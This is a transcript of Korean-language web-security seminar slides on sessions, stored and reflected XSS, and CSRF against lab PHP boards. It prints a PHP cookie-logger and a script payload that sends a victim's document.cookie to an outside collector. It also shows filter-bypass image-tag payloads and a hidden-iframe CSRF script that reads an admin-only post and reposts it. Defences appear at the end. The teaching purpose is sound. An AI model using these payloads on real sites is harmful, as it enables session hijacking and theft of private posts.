web vulnerability seminar3
TRANSCRIPT
![Page 1: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/1.jpg)
Web vulnerability seminar
from make to exploit
![Page 2: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/2.jpg)
Contents
$ PHP + Source code auditing$ DB & SQL injection$ XSS & CSRF$ Something Injection
![Page 3: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/3.jpg)
ㅅ .. 세 .. 세션$ 서버와 유저간의 연결
$ 서버에게 내가 ‘나’ 라는걸 증명 하는 것
![Page 4: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/4.jpg)
PHP SESSION
• 쿠키 -> PHPSESSID
• 이상한 문자열
![Page 5: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/5.jpg)
데자뷰$ 로그인 -> COOKIE
$ COOKIE -> 삭제 -> 안 로그인
$ COOKIE-> 안 삭제 -> 로그인
![Page 6: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/6.jpg)
ㅎㅎ 관리자$ 제 아이디로 글을 쓰세요
$ ??/web/3/
![Page 7: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/7.jpg)
만약 ..
![Page 8: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/8.jpg)
게시글을 읽을때
![Page 9: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/9.jpg)
요청
그림주소 = ‘domain.com/monday.jpg’
![Page 10: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/10.jpg)
문제가 되는 것 ?
$ 아직까지 없음
![Page 11: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/11.jpg)
글을 이쁘게
![Page 12: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/12.jpg)
문제가 되는것 ?
$ 스크립트가 적힌다는 것은 내가 원하는 행동을 일부 할 수 있다는 이야기 .
$ 현재 페이지에서 상대방이 가지고 있는 쿠키 ( 세션 ) 값을 내 서버로 전송해서 기록 할 수 있다면 ?
![Page 13: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/13.jpg)
Stored XSS 개요
1
2
3
4
![Page 14: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/14.jpg)
간단한 테스트 !
<script>alert(“test”)</script>
<script>alert(document.cookie)</script>
<iframe src=‘’/>…
![Page 15: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/15.jpg)
PHP
<?$hijack = "\r\n".$_GET[‘k']." :
".date("Y-m-d h:i:s");$f = fopen("./cookie.txt","a");fwrite($f,$hijack,strlen($hijack));fclose($f);
?>
![Page 16: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/16.jpg)
Payload
<script>location.href=‘http://path/cookie.php?k=‘+document.cookie</script>
![Page 17: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/17.jpg)
With filtering 1
Source
$q = str_replace("script","",$_GET[inp]);
echo $q;
192.168.1.25/web/xss/test.php
![Page 18: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/18.jpg)
With filtering 2
Source
$q = $_GET[inp];if(eregi("script",$q))
exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test2.php
![Page 19: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/19.jpg)
With filtering 3
Source
$q = $_GET[inp];if(eregi("script|alert",$q))
exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test3.php
![Page 20: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/20.jpg)
자연스럽게 글을 쓰면서$ <img src = ‘’ onload =‘’>$ <img src = ‘’ onerror =‘’>$ <img src = ‘’ onmouseover=‘’>
…
![Page 21: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/21.jpg)
Reflected XSS
$ Stored 와 달리 저장할 공간이 없어도 가능
$ Stored 와 같은 행동이 모두 가능함
![Page 22: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/22.jpg)
재탕
그림주소 = ‘domain.com/monday.jpg’
![Page 23: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/23.jpg)
Reflected XSS 개요
1
3
2
4
![Page 24: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/24.jpg)
XSS = XSS
$ Stored 로 가능한 모든 공격을 Reflected 로도 가능함 .
![Page 25: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/25.jpg)
시나리오$ XSS 공격을 확인
$ XSS 를 통해 악성 스크립트가 삽입된 페이지로 이동
$ Reverse Connection!
![Page 26: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/26.jpg)
ㅎㅎ
![Page 27: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/27.jpg)
CSRF
$ XSS 에서 파생되는 2 차 피해
![Page 28: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/28.jpg)
CSRF 개요
12
3
4
![Page 29: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/29.jpg)
Return To XSS
$ <script ~~> 로 서버에 요청을 보내자 !
관리자가 읽게 하여 비밀글을 읽어보자 !
![Page 30: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/30.jpg)
실습$ 글쓰기 예제
<iframe src = 'http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&title=qwer&pw=&contents=zxcv' width=0 height=0 frame-border=0/>
![Page 31: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/31.jpg)
비밀글을 읽어봅시다 .
1. 해당 글이 적힌 페이지를 요청
2. 요청된 페이지의 html 소스코드를 가져옴
3. 가져온 소스코드를 그대로 적음 .
![Page 32: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/32.jpg)
비밀글을 빼옵시다 .<script>
function sending(html){
var f = document.getElementById("csrf");var a = unescape(html)var c = "http://127.0.0.1/web/csrf/board/write_ok.php?
user_id=TEST&title=qwwer&pw=aa&contents="+a;if(html != "")
f.src=c;else
f.src ="";
}
document.write(“<iframe id =‘csrf’ src =http://127.0.0.1/web/csrf/board/view.php?num=70 width=0px height=0px frameborder=0 onload =sending(this.contentWindow.document.body.innerHTML)></iframe>")
</script>
![Page 33: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/33.jpg)
설명document.write("")
인자로 들어간 내용을 HTML 에 적음
각종 변수 값 사용 가능 !
![Page 34: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/34.jpg)
IFRAME
<iframe id =‘csrf’
src=http://127.0.0.1/web/csrf/board/view.php?num=70
width=0px height=0px frameborder=0
onload=sending(this.contentWindow.document.body.innerHTML)></iframe>
![Page 35: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/35.jpg)
Functionfunction sending(html){
var f = document.getElementById("csrf");var a = unescape(html)var c = "http://127.0.0.1/web/csrf/board/write_ok.php?
user_id=TEST&title=qwwer&pw=aa&contents="+a;if(html != "")
f.src=c;else
f.src ="";
}src=http://127.0.0.1/web/csrf/board/view.php?num=70 src=http://127.0.0.1/web/csrf/board/
write_ok.php?user_id=TEST&title=qwwer&pw=aa&contents=
![Page 36: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/36.jpg)
어떻게 할 것인가 < : < > : >
특수기능을 잃어버린다
![Page 37: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/37.jpg)
어떻게 볼 것인가<script>Something Text </script>
<img src =‘’ onload=‘’/>
<img src = ‘evil.php’/>
![Page 38: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/38.jpg)
CSRF 추가 대책$ 요청을 보낸 것이 정말 사람인지 확인
-> captcha
![Page 39: Web vulnerability seminar3](https://reader036.vdocuments.net/reader036/viewer/2022062405/5560f9d8d8b42a424d8b4c25/html5/thumbnails/39.jpg)
요약$ 게시판에 모든 스크립트를 허용하지 않고 딱딱하게 글을 쓰게 하면 됩니다 ..
$ 스크립트를 제공해야 할 경우 , 정규표현식을 통해 지정된 형태에서 벗어나면 OUT!